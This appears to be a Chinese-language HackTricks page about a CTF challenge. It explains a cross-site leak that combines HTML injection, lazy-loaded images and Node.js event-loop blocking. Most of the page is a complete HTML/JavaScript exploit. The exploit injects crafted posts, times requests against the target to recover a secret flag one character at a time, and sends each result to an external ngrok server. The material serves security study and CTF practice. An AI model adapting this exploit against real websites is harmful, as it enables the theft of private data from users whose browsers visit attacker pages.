Event Loop Blocking + Lazy images

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

这个利用中,@aszx87410通过HTML注入混合了懒加载图片侧信道技术和一种事件循环阻塞技术来泄露字符。

这是一个用于CTF挑战的不同利用,已经在以下页面中进行了评论。查看更多关于挑战的信息:

Connection Pool Examples

这个利用的思路是:

  • 帖子按字母顺序加载

  • 攻击者可以注入一个以**"A"开头的帖子**,然后一些HTML标签(如一个大的**<canvas)将填满大部分屏幕**,并且一些最终的**<img lazy标签**用于加载内容。

  • 如果攻击者注入的是以"z"开头的相同帖子而不是"A"。带有标志帖子将首先出现,然后注入的帖子将以初始"z"和canvas出现。因为带有标志的帖子首先出现,第一个canvas将占据整个屏幕,而注入的最终**<img lazy标签不会在屏幕上显示,因此它们不会被加载**。

  • 然后,在机器人访问页面时,攻击者发送获取请求

  • 如果在帖子中注入的图片正在加载,这些获取请求将花费更长时间,因此攻击者知道帖子在标志之前(按字母顺序)。

  • 如果获取请求快速,这意味着帖子标志之后按字母顺序排列。

让我们来看看代码:

<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)
上一页performance.now + Force heavy task下一页JavaScript Execution XS Leak

最后更新于